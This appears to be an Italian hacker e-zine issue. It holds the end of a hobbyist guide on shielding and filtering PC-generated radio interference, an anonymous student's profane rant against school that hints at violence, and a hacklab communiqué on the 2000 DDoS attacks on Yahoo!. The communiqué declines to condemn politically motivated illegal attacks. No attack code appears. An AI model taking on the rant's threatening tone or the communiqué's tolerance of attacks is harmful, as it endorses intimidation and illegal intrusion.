ricoperto di metallo conduttivo può servire allo scopo. Ricordate, lo schermo conduttivo NON
deve assolutamente venire a contatto con i componenti; ponete estrema attenzione a tale
particolare, in quanto esiste sempre il pericolo di scosse elettriche quando si mettono le
mani nei monitor. Evitate di effettuare da soli questo tipo di operazione a meno che non
siete assolutamente certi di quello che vi accingete a fare.
Ecco cosa Gary Coffman KE4ZV ha da suggerire riguardo allo schermaggio:
"Se il colpevole è il monitor, sono in commercio degli spray conduttivi che possono essere
spruzzati sulla parte interna del cabinet in plastica, per tentare di ridurre to ridurre
l'irradiazione di segnali. La GC Electronics ne produce uno che funziona bene. Dovrete
smontare il coperchio posteriore del monitor e spruzzare lo spray sulla superficie del
coperchio; naturalmente è preferibile spruzzare lo spray sulla superfiche interna, per
non guastare l'estetica del monitor. Quando rimontate il coperchio, assicuratevi che la
sezione ad alta tensione del monitor si trovi a distanza adeguata dal coperchio che ora
conduce corrente; in caso contrario, incollate un pezzo di carta oleata (quella utilizzata
per avvolgere i salumi o il pesce) nei punti appropriati, per evitare scariche ad arco.
Eccetto per il caso in cui il monitor sia uno con chassis collegato alla tensione di rete,
fate venire a contatto la copertura conduttiva con lo chassis, e collegate un cavo dallo
chassis alla presa di terra della vostra stanza. Se il monitor è a colori, la maschera
shadow nel tubo catodico costituisce già di per se' un'adeguato schermaggio, ma se si
tratta di un monitor monocromatico, allora potrebbe essere necessario schermare la
superficie frontale del tubo catodico spruzzando un leggerissimo strato di vernice al rame;
spruzzatela fino a creare un sottile velo di color nero, che fungerà anche da schermo
antiriflesso.
Se avete appurato che il cavo del segnale video del monitor irradia RFI, per prima cosa
assicuratevi che il cavo utilizzato sia schermato, e quindi utilizzate qualche nucleo di
ferrite sul cavo; è consigliabile montare questi nuclei su *ogni* cavo esterno.
Se invece il colpevole è il PC, graffiate la vernice circostante le viti in modo tale che
le varie parti componenti il case siano ben collegate elettricamente, e aggiungete ulteriori
viti in modo tale che ogni giunzione abbia almeno una vite ogni 5 cm lungo tutta la sua
lunghezza; questo è ciò che serve per creare una buona gabbia di Faraday. Ogni apertura del
case dovrebbe essere ricoperta con treccia di rame schermante; l'apertura del drive floppy
rappresenta un problema: non è possibile ricoprirla poichè sarebbe poi impossibile accedere
al drive. Il miglior modo per aggirare il problema consiste nel schermare l'intero
alloggiamento del drive dall'interno e ed accettare eventuali disturbi generati dal drive
quando è in funzione. Non dimenticate di collegare un cavo dal case alla presa di terra
della vostra stanza.
Naturalmente, risulta sempre di grande aiuto posizionare l'antenna della radio il più
possibile distante dal PC, e collegare l'antenna alla radio tramite un cavo coassiale ben
schermato. Lo chassis della radio dovrebbe essere collegato ad una buona presa di terra. Se
utilizzate un HT (me ne dispiace) allora potrebbe essere necessario collocare la radio ed
il TNC distanti dal PC, collegando quest'ultimo al PC tramite un lungo cavo RS232; si noti
che anche il TNC potrebbe essere una sorgente di rumore. In alcuni casi è meglio lasciare
il TNC vicino al computer e collocare la radio a distanza, collegandola al PC con lunghi
cavi audio e di controllo. Il TNC inoltre dovrebbe essere trattato allo stesso modo del PC;
graffiate la vernice nei punti dove sono montate le viti, ed aggiungetene delle altre per
migliorare il collegamento a massa del contenitore. Se invece il contenitore è in plastica,
allora o verniciate la parte interna con spray conduttivo, oppure lo montate in un
contenitore metallico."
Se utilizzate lo spray, assicuratevi di applicarne uno strato il più uniforme possibile, e
ripetete il procedimento alcune volte al fine di ottenere un migliore schermaggio. Non
sprecate troppo spray su un punto, ma assicuratevi che la copertura non presenti delle aree
troppo "sottili". Lo stesso metodo può essere applicato al case dell'unità centrale o al
contenitore della tastiera. L'efficacia di un tale metodo sulla tastiera è comunque
discutibile, vista la difficoltà di costruira una adeguata gabbia di Faraday attorno alla
circuitazione che genera RFI; occorre inoltre agire con molta cura per evitare di causare
eventuali cortocircuiti, vista le dimensioni molto ridotte della maggioranza delle tastiere.
Anche lo schermaggio dei cavi è molto importante; assicuratevi che il cavo del segnale video
sia dotato di una buona schermatura; lo stesso dicasi per i cavi seriali e paralleli e,
naturalmente, anche il cavo d'antenna deve essere adeguatamente schermato. Per i cavi
d'antenna evitate l'utilizzo dei cavi coassiali TV a 75 Ohm, poichè questi in genere non
garantiscono una schermatura sufficiente. Provate invece un cavo tipo RG-58-C/U
(che a mio parere garantisce una schermatura migliore rispetto al tipo RG-58-A/U) o un qualche
altro tipo di cavo ad elevata schermatura come RG-8 e similari. Una discesa di antenna ben
schermata contribuisce enormemente a ridurre la RFI. Ho anche sentito che tutti gli apparecchi
dovrebbero essere collegati ad una buona presa di terra attraverso un cavo o treccia di grosso
diametro; il suggerimento risponde probabilmente a verità e, se avete la possibilità di
metterlo in pratica, perchè non farlo. Per collegare i cavi d'antenna alla radio, utilizzate
preferibilmente dei connettori appropriati, come il PL-259 o qualcosa di similare. In tutti
i casi, assicurate una buona terra alla schermatura; una discesa di antenna ben schermata può
in alcuni casi eliminare fino all'80% della RFI, o ancora di più. Ad ogni modo, se effettuate
ascolto sulle bande VHF e UHF, la lunghezza del cavo di discesa dell'antenna andrebbe
soppesata contro le perdite di segnale provocate dalla discesa stessa. Cavi tipo il 9913
presentano delle perdite molto basse, ma per contro sono abbastanza costosi; ad ogni modo,
se potete affrontare la spesa, non esitate ad utilizzarli. Personalmente trovo che il tipo
RG-58 sia il tipo di cavo con cui è più semplice lavorare.
Alcune volte, in alcune unità centrali, potrebbero esserci alcuni componenti difficili da
schermare, come ad esempio il drive per i dischetti; questo non è un problema serio, visto
che il drive non è operativo per la maggioranza del tempo, ma se proprio avete deciso di
tentare anche lo schermaggio del drive, ricordate che tutto lo schermo deve essere ben
collegato elettricamente. Lo stesso dicasi per il resto del case del computer; se possibile,
utilizzatene uno dotato di un adeguato schermaggio in metallo su tutta la superficie.
Il nostro obiettivo è quello di ottenere una buona gabbia di Faraday, cosi che l'intero case
sia ben schermato; graffiate la vernice presente sotto le viti, in modo che ci sia un buon
contatto elettrico dappertutto.
Anche altri connettori esposti e splitters (che sono comunque sconsigliati) possono
contribuire all'ingresso della RFI, pertanto sarebbe consigliabile controllare anche il loro
schermaggio.
7. Problemi di filtraggio
I circuiti di alimentazione rappresentano in senso di importanza la successiva via d'ingresso
per la RFI. In alcuni apparecchi mal progettati, la RFI non viene filtrata in modo adeguato
nei circuiti di alimentazione del computer o del monitor e quindi riesce ad infiltrarsi nella
rete elettrica e da lì nell'alimentatore della radio, per raggiungere poi la sezione RF
(o a volte anche la sezione AF) del ricevitore. Questo tipo di problemi può essere normalmente
ridotto utilizzando un filtro di linea per gli alimentatori degli apparecchi interessati;
assicuratevi che il filtro di linea sia idoneo a supportare il carico di corrente che deve
scorrere attraverso il cavo, altrimenti potrebbe bruciarsi. Esiste in commercio un tipo di
filtro di linea che è essenzialmente costituito da una presa da sostituire a quella presente
nell'alimentatore; non sono a conoscenza del grado di miglioramento apportato da questo tipo
di filtro, ma se decidete di intraprendere un tale approccio, fatelo con cura! Oltre ad usare
filtri di linea, è anche possibile utilizzare perline di ferrite e toroidi su pressochè tutte
le linee; procuratevi un mucchietto di questo materiale e sperimentate. Potreste anche
provare a mettere alcune perline di ferrite sul cavo di discesa dell'antenna, che fungeranno
da balun ed impediranno alla RFI di viaggiare sulla calza di schermo del cavo. Esistono in
commercio molti tipi di nuclei RF in ferrite, modelli "clip on" e modelli già precostruiti,
che possono essere utilizzati. L'Handbook ARRL descrive alcuni di questi dispositivi. Mi sono
autocostruito un balun 4:1 (BAL-anced to UN-balanced) per la discesa coassiale della mia
antenna a dipolo, che ora riceve la RFI generata dal computer e rumori di altre fonti in
misura molto minore grazie al buon accordo di impedenza ed alle migliorate caratteristiche di
trasferimento di energia. Un altro beneficio di un buon sistema di antenna è rappresentato da
una migliore selettività. Filtri di linea e nuclei RF possono fare miracoli, perciò
sperimentate con questi aggeggi installandoli in varie posizioni strategiche come alimentatori,
alcune linee audio, etc.
Oltre che attraverso le linee di alimentazione, la RFI spesso entra attraverso altre linee dati
e di controllo nella porte parallele e seriali, così come nelle porte video. Oltre ad
utilizzare le perline in ferrite su queste linee, potreste tentare di collegare dei
condensatori di piccolo valore tra le linee e la massa. Per le linee parallele e seriali,
utilizzate dei condensatori da 0.01 uF (possibilmente multistrato, MKT, ma anche altri tipi
andranno comunque bene), mentre per le porte video collegate dei condensatori da 100 pF dai
segnali RGB, H-Sync e V-Sync verso la massa; l'installazione di questi condensatori potrebbe
provocare qualche effetto collaterale sulle linee, pertanto è consigliabile sperimentare con
condensatori di valore leggermente superiore o inferiore.
Se vi interessa ricevere solo determinate bande, allora è possibile utilizzare un filtro
passabanda, passa-alto o passa-basso collegato sull'ingresso d'antenna del ricevitore; si noti
ad ogni modo che un tale filtro non è in grado di ridurre il rumore presente nella stessa
banda. E' anche possibile utilizzare un filtro notch sul cavo d'antenna, per tagliare via
determinate emissioni di forte intensità, come ad esempio la frequenza di oscillazione del
quarzo a 14.316 MHz della scheda video o il generatore di baud-rate. Si noti che qualunque
tipo di filtro (esclusi quelli attivi) produce delle perdite di segnale in grado più o meno
elevato, e se il vostro segnale ricade troppo vicino all'emissione indesiderata, allora non
potrete utilizzare un filtro notch perchè in caso contrario anche il segnale desiderato verrebbe tagliato via. In questi casi è spesso preferibile un filtro notch ad alto Q.
Riguardo all'uso di filtri clip-on (come quelli commercializzati dalla RS), ecco cosa ha da
dirci Steve Byan:
"Il "nucleo clip-on" consiste in un una perlina di ferrite divisa in due, racchiusa in un
contenitore di plastica, costruita per la soppressione della RFI generata dai personal
computer; le due metà della perlina vanno posizionate attorno al cavo da schermare, e poi
agganciate tramite un sistema di aggancio. E' possibile ottenere lo stesso effetto
inserendo una perlina di ferrite attorno al cavo coassiale prima di collegarvi il connettore
all'estremità.
Quest'idea è simile ai balun in perline di ferrite utilizzati dai radioamatori;
l'idea è quella di incrementare l'impedenza al flusso di corrente RF sulla parte esterna
della calza di schermo del cavo coassiale, in modo da impedire (idealmente) al cavo coassiale
di diventare parte integrante dell'antenna.
Stento a credere che una o poche di queste perline della Radio Shack montate sul cavo
coassiale possano produrre un qualche effetto; penso che ce ne vorrebbero un buon numero
per creare una induttanza sufficiente a produrre un qualche effetto.
Sarebbe meglio utilizzare le perline sull'apparecchio che genera i disturbi.
Personalmente raccommanderei il metodo di John Doty, consistente nel collegare a terra la
calza di schermo del cavo coassiale dell'antenna, e nell'installare, dove possibile, il
cavo coassiale interrato o molto vicino alla superifcie della terra. Penso che questi
accorgimenti aiutino a minimizzare la cattura delle sorgenti locali di rumore in modo più
efficace rispetto all'utilizzo di qualche perlina di ferrite nei pressi del ricevitore."
Il disaccoppiamento e il filtraggio della linea di alimentazione è essenziale per raggiungere
le prestazioni ottimali. L'alimentatore standard montato sulla maggioranza dei PC è un
alimentatore switching; tali sistemi, sebbene molto efficienti, tendono a generare disturbi
impulsivi e armoniche indesiderate a causa dell'effetto switching. Intuile dirlo, se questi
disturbi non vengono gestiti in modo appropiato, possono trasferirsi nella rete elettrica e
da li nella vostra radio. Di solito non si tratta di un problema serio, in quanto di solito
nella progettazione ne viene tenuto conto; ciò che preoccupa maggiormente è il clock della CPU
che si infiltra nella rete elettrica attraverso l'alimentatore. Ancora una volta, un filtro di rete rappresenta la soluzione al problema.
Spesso, quando è necessario convogliare l'audio del ricevitore nel computer, potreste prendere
in considerazione un qualche modo per isolare il segnale piuttosto che collegarlo direttamente
al computer. Un semplice sistema consiste nell'utilizzo di un trasformatore audio 1:1;
personalmente ho riscontrato un leggero miglioramento, ma non fino al punto da soddisfare le
mie aspettative. Ho anche provato a connettere l'audio del ricevitore ad un radiomicrofono FM
adattato, per poi ricevere l'audio da inviare al computer con un normale ricevitore FM. Sembra
in effetti un sistema macchinoso, ma potrebbe rappresentare un'ultima risorsa, o potrebbe
venire in aiuto a chi intende realmente posizionare il computer ad una distanza considerevole
dalla radio. E' possibile realizzare altre forme di isolamento utilizzando raggi infrarossi o
trasmissioni ottiche; tutti questi sistemi forniranno un eccellente isolamento perlomeno nel
caso in cui la linea audio costituisca la principale via di ingresso per la RFI.
8. Problemi di progettazione
I problemi di RFI sono a volte aggravati da una cattiva antenna o da un ricevitore di scadente
progettazione. Il disadattamento di impedenza dell'antenna, per esempio, può peggiorare
ulteriormente le cose; in tale situazione, può venire in aiuto l'utilizzo di balun e
accordatori d'antenna. Sebbene si supponga che una discesa di antenna in cavo coassiale
riesca a tenere la RFI alla larga, in realtà un'antenna ed un cavo disadattati possono far
catturare la RFI dalla calza di schermo del cavo coassiale. Pertanto, se state utilizzando
un cavo coassiale collegato direttamente ad un dipolo bilanciato, provate ad utilizzare un
balun nel punto di alimentazione. I balun sono veramente semplici da costruire, ed i progetti
per la realizzazione possono essere reperiti anche nell'handbook ARRL; i balun possono anche
adattare l'impedenza dell'antenna a quella del cavo di discesa. I balun, essendo quello che
sono, normalmente provocano una qualche perdita di segnale ma, in un balun di buona qualità,
la perdita è insignificante se paragonata alle perdite del cavo stesso; d'altro canto, la
perdita di intensità del segnale è spesso compensata dal migliorato rapporto segnale/rumore.
Non ho avuto conferma di questo, ma la RFI fuori banda può essere ridotta con l'uso di
accordatori d'antenna, che forniscono una migliore selettività; questi accordatori possono
essere facilmente costruiti utilizzando uno dei tanti progetti reperibili nell'ambiente
radioamatoriale, perchè gli accordatori commerciali tendono ad essere abbastanza costosi e
vengono forniti con misuratori di onde stazionarie ed altre simpatiche caratteristiche che non
occorrono al radioascoltatore, che deve effettuare semplicemente la ricezione dei segnali
radio. Nel mio caso (un cavo coassiale che alimentava fuori centro un dipolo), il balun ha
fatto miracoli nel miglioramento del rapporto segnale/rumore ed in realtà ho riscontrato un
aumento dell'intensità dei segnali; con ciò non voglio dire che il balun aumenta il guadagno,
ma che la selettività da esso fornita può impedire al circuito AGC del ricevitore di ridurre il
guadagno per via dei disturbi, producendo come risultato un'apparente aumento dell'intensità
del segnale.
Ecco cosa ha da dirci Kok Chen AA6TY sui sistemi di antenna non accordati:
"Ed infine, proprio come il collegamento di un cavo cossiale ad un'antenna bilanciata rende
il cavo coassiale parte integrante del sistema radiante, così avviene anche il contrario se
un tale sistema d'antenna viene usato per la ricezione. Se alimentate una antenna di
ricezione bilanciata utilizzando una linea sbilanciata come ad esempio il cavo coassiale,
la schermatura del cavo coassiale raccolgierà il rumore trasferendolo all'ingresso d'antenna
del ricevitore. Per evitare il problema, collegate un balun tra il cavo coassiale e
l'antenna stessa."
Un guadagno eccessivo, come nel caso di un preamplificatore d'antenna, non sempre migliora il
rapporto segnale/rumore perchè il rumore viene amplificato insieme al segnale. Sotto questo
aspetto, un preamplificatore montato su palo dell'antenna fornisce normalmente prestazioni
migliori.
In alcuni apparecchi digitali il disaccoppiamento delle tensioni di alimentazione non è
realizzato a dovere, e quindi la RFI potrebbe non essere soppressa a sufficienza. Per porre
rimedio è sufficiente montare dei condensatori da 0.1 uF tra la tensione di alimentazione e
la massa lungo tutti i punti dell'alimentatore e del circuito. L'operazione potrebbe sembrare
stupida, qualcuno potrebbe obiettare che sarebbe sufficiente montare un unico condensatore di
maggiore capacità ma sebbene le proprietà elettriche in corrente continua siano similari, la
capacità distribuita ha un effetto differente sulla RF. Sarebbe consigliabile assicurarsi che
tutte le tensioni di alimentazione siano disaccoppiate a dovere, e che sui regolatori di
tensione non abbiano luogo oscillazioni indesiderate.
Anche la direttività delle antenne può aiutare a migliorare la ricezione del segnale in
presenza di RFI. L'antenna a loop, per esempio, può essere posizionata in modo da annullare
totalmente la ricezione nella direzione della fonte di RFI. E' una prova che non ho effettuato
di persona ma in teoria dovrebbe funzionare, anche se non posso esprimermi sulle reali
prestazioni di un tale sistema. Similarmente anche il dipolo presenta determinate proprietà di
direttività, dalle quali si può trarre vantaggio per ridurre la RFI.
L'utilizzo di accordatori d'antenna e di preselettori può aiutare a ridurre il rumore fuori
banda e può quindi fornire un segnale più chiaro, specialmente se viene utilizzato un
accordatore ad altro Q nel front-end della radio. Se viene utilizzata un'antenna con
preamplificatore, è probabilmente preferibile montare sia l'antenna che il preamplificatore
sul palo, in modo che venga amplificato il solo segnale utile e non la RFI generata dal
computer. Questo accorgimento è particolarmente importante nell'utilizzo di preamplificatori
RF a larga banda, che sono maggiormente suscettibili al rumore. Attualmente possiedo
un'antenna attiva MFJ modello 1020-A completa di preselettore che nel mio caso funziona bene,
riuscendo a rimuovere un ammontare considerevole di segnali fuori banda pur se allo stesso
tempo amplifica anche il rumore di fondo. Un utilizzo giudizioso di un tale sistema può aiutare
a migliorare la ricezione di molti segnali, specialmente i segnali a portante continua come
le emissioni RTTY, FAX e SSTV.
Nel caso intendete autocostruirvi l'interfaccia, provate per quanto possibile a montarla in un
contenitore schermante, o un contenitore metallico; questo accorgimento potrebbe aiutare a
ridurre l'ingresso della RFI nella radio.
9. Altre misure da adottare
Oltre ai suggerimenti già forniti, se intendete utilizzare il computer per la ricezione di
segnali CW/RTTY o altri segnali digitali, un buon filtro IF o audio risulterà di grande aiuto
nella rimozione del rumore indesiderato. I vantaggi dei diversi tipi di filtri sono descritti
in dettaglio nell'Handbook ARRL. Se potete spendere, un filtro DSP rappresenta senza dubbio la
scelta migliore, in grado di garantire migliori prestazioni e maggiore versatilità rispetto
ai normali filtri a capacità commutata, filtri Notch, ecc. Di nuovo, non posso parlare per
esperienza diretta; i filtri passabanda sono abbastanza semplici da costruire, e magari
potreste sperimentare con alcuni progetti prima di fare il grande investimento per un
apparecchio commerciale.
Per coloro che stanno pensando di acquistare un nuovo computer, ho sentito che i notebooks
presentano delle emissioni di RFI molto basse e risultano pertanto particolarmente adatti
all'utilizzo con le radio.
Se, come nel mio caso, non vivete vicino al piano terra, potreste prendere in considerazione
l'utilizzo di un sistema d'antenna bilanciato, che non richiede alcuna terra, oppure potreste
procurarvi una di quelle 'Terre artificiali' commercializzate dalla MFJ. Ecco una citazione da
un messaggio inviatomi da Scott N3FI al riguardo:
"Ho acquistato dalla MFJ quest'oggetto denominato 'Terra Artificiale', che consiste in un
circuito LC ed un cavo controbilanciato, penso collegati in parallelo. Questo circuito
permette di "sintonizzare" la reattanza al di fuori del cavo controbilanciato in modo tale
che "sembri" come una vera terra nei confronti dello shack. Non più scosse sul vostro
microfono! Non so se questo accessorio sia necessario anche sui ricevitori, ma penso di no.
Ricordate solo che la presa di terra presente sulla presa di corrente è effettivamente
una terra a 50 o 60 Hz, ma NON a frequenze di vari MHz. Il vostro intero impianto elettrico
si comporterà come un'antenna!"
Ricordate di non tenere il cavo di discesa dell'antenna parallelo alle linee elettriche per
tutta la sua lunghezza, e cercate di evitare l'utilizzo di lampade fluorescenti se possibile;
alcune delle più vecchie lampade di questo tipo montano nuclei difettosi che tendono a
generare del rumore. Le costruzioni più moderne dovrebbero essere a posto, ma le vecchie
tendono a soffrire di questo problema. Visto che siamo in argomento, ricordate che non sempre
la RFI viene generata dal vostro computer e/o monitor; specialmente al giorno d'oggi sempre
più gente vive in appartamenti in condiminio o anche abitazioni unifamiliari molto vicine tra
loro, e quindi anche il computer di qualche vicino potrebbe costituire una fonte di rumore. Un
modo per accertarsene è di instaurare un colloquio cordiale con il vostro vicino o utilizzare
un qualche tipo di lamina metallica schermante sulle pareti, tenendo presente che nelle
costruzioni in calcestruzzo le pareti contengono delle barre di acciaio, e quindi sarebbe
inutile schermarle ulteriormente.
10. Conclusione e ringraziamenti
La RFI è stata un problema imbarazzante e continuerà ad esserlo fino a che i produttori di
computer non lo prenderanno in considerazione come tale. Sono benvenuti eventuali contributi
e altri suggerimrnti, in modo che si possa compiere dei passi in avanti nella nostra lotta
contro la RFI. Grazie a LISO che è sempre il migliore!
sYn^:se serve l'email scrivete a me e ve la faro' recapitare al piu' presto possibile,10x.
===ooO===0===Ooo===oOOo===ooO===0===Ooo==--=Riflessione=--====ooO===0===Ooo===oOOo===ooO===0===
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] > Team H@ < [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
============ Riflettiamo sui nostri diritti ===========
(Voce di un alunno)
Ragazzi è andata come è andata ma tra cortei tentata autogestione e vandali che si
introducevano di notte nella scuola che rischiavano il culo per noi non è cambiato
proprio niente siamo sempre nella solita scuola di merda senza niente e con un figlio
di puttana che ci comanda ovvero il preside *********** comunque spero che quest'anno
vada meglio.Purtroppo dopo 3 mesi è incominciata la scuola ma spero che quest'anno sia
tutto diverso,vorrei che la scuola fosse come i bagni alla stazione "sempre OKKUPATA".
Queste parole vengono dal fatto che noi alunni veniamo presi per il culo da gente che ha
il coltello dalla parte del manico a che chi sa chi si credono di essere e noi purtroppo
dobbiamo sempre subire escluso il sottoscritto facendo finta di niente.Ma chi è che sta nella
merda siamo noi alunni siamo noi poveri alunni che lo prendiamo sempre in culo da tutti,
mi sa però che sara sempre cosi perchè i ragazzi che lottano per i nostri diritti non sono
piu quelli di una volta ricordando il grande "Paolo Ma****O".E poi tutti voi vi accontentate
di stare nella merda subendo soltanto, ma questa è la vita c'è chi lotta sempre per i propri
diritti e chi lo prende sempre in culo.Io non sono contro il ragazzo raccomandato ma con chi
lo raccomanda e neanche con il ragazzo lecchino ma contro chi fondamentalmente il culo se lo
fa leccare e la colpa non è neanche di chi corrompe ma di chi è corrotto quindi non dobbiamo
prendercela con i ragazzi che leccano ma a chi piace a essere leccato e capisc' a me.Noi siamo
giovani che diamine quindi sono arrivato alla conclusione e cioè che nella scuola va avanti
chi lecca chi è raccomandato e chi si fa un mazzo tanto studiando e rovinandosi la vita.Io non
sono uno di questi e mai lo sarò ma come stanno i fatti io voglio far quadrar le cose infatti
tanti come me lo prendono sempre in culo perchè non essendo appoggiati da nessuno si prendono
la colpa di tutto,questa è la dura vita di chi come me nei confronti della società mette in
risalto i problemi e cerca di combatterli.Comunque concludo dicendo che se devo andare a
scuola nella merda preferisco starne fuori ed evitare di aprire il culo a qualcuno perchè
le mani addosso agli stronzi non le ho mai messe ma in casi estremi potrei anche farlo ma
dovranno ripitturare la scuola per evitare di spargere sangue suggerisco occupare, chi vuole
capire capisca.Spero che queste poche riga facciano meditare tutti quelli che leggeranno.
Anonimo
Questo studente si riferisce alla scuola ma come tutti sanno ormai tutti gli ambienti sociali
sono pieni di gente che ne approfitta.
Credo che in giro ci siano molti ragazzi come questo che vorrebbero cambiare qualcosa
nella nostra società ormai corrotta ma non hanno il coraggio di parlare oppure preferiscono
stare zitti perchè pensano che nessuno li ascolti.Non abbiate paura se volete far quadrare
le cose potete scrivermi (avatar31@libero.it) e i testi che mi arriveranno li valutero' e
forse saranno pubblicati.
Vorrei fare dei ringraziamenti a Tasso e a DeMa che mi anno fornito questo Discorso e fare
un saluto a tutta la 3C. A[v]a[t]A[r]
Ricordate Zero posto per L'infame
___________________________________________________________________________________
-----------------comunicato hacklab-fi sugli Hackers Days-----------------
Con questo intervento intendiamo aprire una discussione su come mutano per Internet gli scenari economici politici e giudiziari dopo il
martellamento mediatico dellimmaginario collettivo che ha fatto seguito agli "Hackers Days" (come sono stati ribattezzati dalla stampa USA gli
attacchi che hanno bloccato per qualche ora Yahoo! e altri noti siti del commercio elettronico") e su come affrontare i problemi che questi
mutamenti pongono a chi intenda mantenere quegli spazi di comunicazione libera e non omologata al "pensiero unico" che sinora è stato
possibile aprire dentro Internet.
La prima cosa che si impone anche allosservatore superficiale è quanto sia stata enorme la sproporzione tra quanto è effettivamente
successochi bazzica la rete sa bene che il down di qualche ora di un server è cosa abbastanza comune, e che la stragrande maggioranza degli
utenti da sè non si sarebbe nemmeno accorta di quel che era successoil panico generale che si è sollevato o che si è preteso di sollevare, e le
misure che si vorrebbero adesso far credere destinate a "ripristinare la sicurezza di tutti su Internet".
Nemmeno le conseguenze finanziarie dellepisodio giustificano il gigantesco spettacolo mediatico e gli strappamenti di capelli di presidenti USA
e governi messi in scena per loccasione. Chi ha familiarità con gli andamenti borsistici sa bene che i cali dellindice Dow-Jones e Nasdaq che si
sono verificati (seguiti del resto da pronti rialzi grazie alla vertiginosa impennata dei titoli delle aziende che si occupano di sicurezza) sono
fisiologici, specie quando ci sono in ballo capitalizzazioni finanziarie gonfiatissime come quelle di cui sono stati oggetto i siti del commercio
elettronico. E sa benissimo che in occasioni del genere, se cè qualcuno che ci perde cè anche qualcun altro che ci guadagna.
Ma si ingannerebbe anche chi volesse vedere in questa sproporzione solo la consueta isteria mediatica di giornalisti e mezzibusti televisivi a
caccia di notizie strabilianti da vendere. Stavolta, ad aprire il gran ballo la cui solfa finale è come sempre "più sicurezza in rete per difendere il
commercio elettronico" (e vedremo cosa significa questo discorso) sono stati gli astri più luminosi nel firmamento del potere mondiale. Poche
ore dopo laccaduto, Janet Reno, ministro della giustizia USA, ha solennemente promesso al mondo la cattura dei "cybercriminali del terzo
millennio" (suona bene, nevvero?) Clinton ha esternato le sue stupefatte preoccupazioni. Parlamenti e governi di tutto il mondo si sono accodati
ai leader del Nuovo Ordine Mondiale nelle esortazioni a identificare e scongiurare questa nuova minaccia allumanità. A questo proposito, si
potrebbe anche osservare che forse forse, agli albori del terzo millennio, ci sarebbero per lumanità dei pericoli un tantinello più gravi di cui
preoccuparsi: le guerre di sterminio, linquinamento ambientale e lo spreco delle risorse, la miseria, lo sfruttamento e la morte per fame e malattia
di centinaia di milioni di uomini donne e bambini... Problemi che magari non sono così cyberaffascinanti, ma da cui lumanitàivi compresi quei
due miliardi di persone che in vita loro non hanno mai fatto una telefonata
è magari un tantinello più afflitta che non dal simpaticone di turno che viola un sito Web per falsificare le parole di Clinton e mettergli in bocca
che in rete ci vuole più pornografia, venendo promosso per qualche giorno al rango di spauracchio mondiale. Ma si sa, noi siamo degli
irriducibili renitenti al pensiero unico, e siamo così pericolosamente estremisti da credere che i sacri principi del business e della logica del
profitto non bastino a giustificare la barbarie e gli orrori del "Nuovo Ordine Mondiale"...
Comunque, retoriche millenariste a parte, le ipotesi sugli autori di questo "vilissimo attentato" si sono sprecate. Si va dalle esilaranti
dichiarazioni di Eric Holder (viceministro della giustizia USA) che ha dato la colpa ai genitori americani, che trascurano di sorvegliare i loro vispi
pargoletti quando stanno al computer, alle seriose ipotesi dellFBI sul "nuovo terrorismo elettronico" nato sulla scia del complotto in rete ordito
da cospiratori internazionali per fracassare le vetrine di Seattle. Su questultimo punto in particolare si è accanita la stampa, insistendo nel
confondere (spesso con fraintendimenti tecnici tanto assurdi quanto divertenti, specie se messi in bocca allhacker di turno frettolosamente
scovato a scopo di intervista) consolidate e tradizionali pratiche di disobbedienza civile in rete quali il "netstrike" o linvio massiccio di e-mail di
protesta con un attacco tipo "distributed denial of service" come quello attuato contro Yahoo! e co.
A questo proposito, dobbiamo essere decisi nel denunciare che dietro "fraintendimenti" del genere può nascondersi il tentativo autoritario di
equiparare alcune tecniche di disobbedienza civiletutto sommato legalitariea comportamenti che costituiscono reato penale. Ma dobbiamo
anche essere altrettanto decisi nellaffermare che noi non condanniamo nè ci dissociamo a priori da chi decide di "commettere reato" per motivi
che ci sembrino politicamente ed eticamente condivisibili <<Anche se non tutti condividiamo la logica dellazione individuale e del sabotaggio
"mordi e fuggi">>. Sappiamo troppo bene quali abusi, orrori ed ignominie possono essere coperti dal manto della legge dello stato perché il suo
rispetto ci sembri lunica o più importante considerazione da fare in circostanze del genere. Se questo suona sgradito a chi ha tentato
affannosamente di ricoprire lhacker col vestito della rispettabilità a tutti i costifingendo di scordare o ignorando quanti hacker con la legge
hanno avuto problemi in nome della libera circolazione dei saperi e dellinformazionemolto semplicemente non sappiamo che farci.
Ma nemmeno ci interessa giocare agli investigatori da romanzo giallo o rivendicare un movente politico di nostro gusto per unazione che resta
invece aperta a tutte le interpretazionivista la totale assenza di ogni dichiarazione o rivendicazionee sulla quale ogni ipotesi è legittima. Una
volta sottolineato che la scelta dei siti da attaccare non sembra casuale (si trattava dei siti maggiormente rappresentativi del commercio
elettronico e che avevano visto maggiormente crescere le proprie quotazioni in borsa) e che chi ha compiuto lattacco ha avuto se non altro la
competenza necessaria a non farsi rintracciare, ci interessa innanzitutto prendere in esame quale realtà stia prendendo forma dietro le roboanti
dichiarazioni sulla necessità di ripristinare "la sicurezza in rete" da cui siamo stati subissati nei giorni successivi.
E una prima realtà da prendere in considerazione, ignorata da quasi tutti, è questa: LE BANCHE USA SAPEVANO IN ANTICIPO
DELLATTACCO. Secondo una nota dellAssociated Press del 14 Febbraio, il "Financial Services Information Sharing and Analysis Center"
(FSISAC) aveva diramato diversi allarmi urgenti agli esperti di sicurezza di varie banche USA almeno quattro giorni prima degli inizi degli
attacchi, indicando anche alcuni indirizzi Internet di macchine compromesse da cui lattacco sarebbe arrivato. Ma la notizia non è stata
trasmessa dalle banche allFBI o ad altre agenzie di polizia USA.
Va sottolineato che il FSISAC, secondo lAssociated Press, è un centro informazioni riservato, al punto che la sua stessa locazione fisica e
lelenco delle banche che usufruiscono dei suoi serviziche costano sino a 125.000 dollarisono tenuti segreti. Questo centro è stato
recentemente sviluppato e potenziato dietro diretto ordine presidenziale e in questa occasione si è dimostrato molto efficace. Le banche hanno
potuto tenere segreta la notizia degli imminenti attacchi grazie a una precisa disposizione voluta dal Dipartimento del Tesoro USA, per cui non
sono tenute a condividere con gli organismi di polizia statali e federali eventuali notizie e informazioni su reati ottenute attraverso questo di
sorveglianza. I vertici USA hanno ritenuto che qualunque obbligo in questo senso avrebbe disincentivato le banche ed altri soggetti strategici
per leconomia statunitense dallattrezzarsi per una efficace vigilanza contro "impiegati disonesti, bug nel software, virus ed hacker".
Senza voler commentare se questa notizia possa dare particolare credibilità alle ipotesi di chi ha visto negli attacchi ad Yahoo! etc. una manovra
volta a destabilizzare la borsa a fini speculativi, ci pare evidente come essa getti una luce un tantinello diversa sulla stupefazione di Clinton
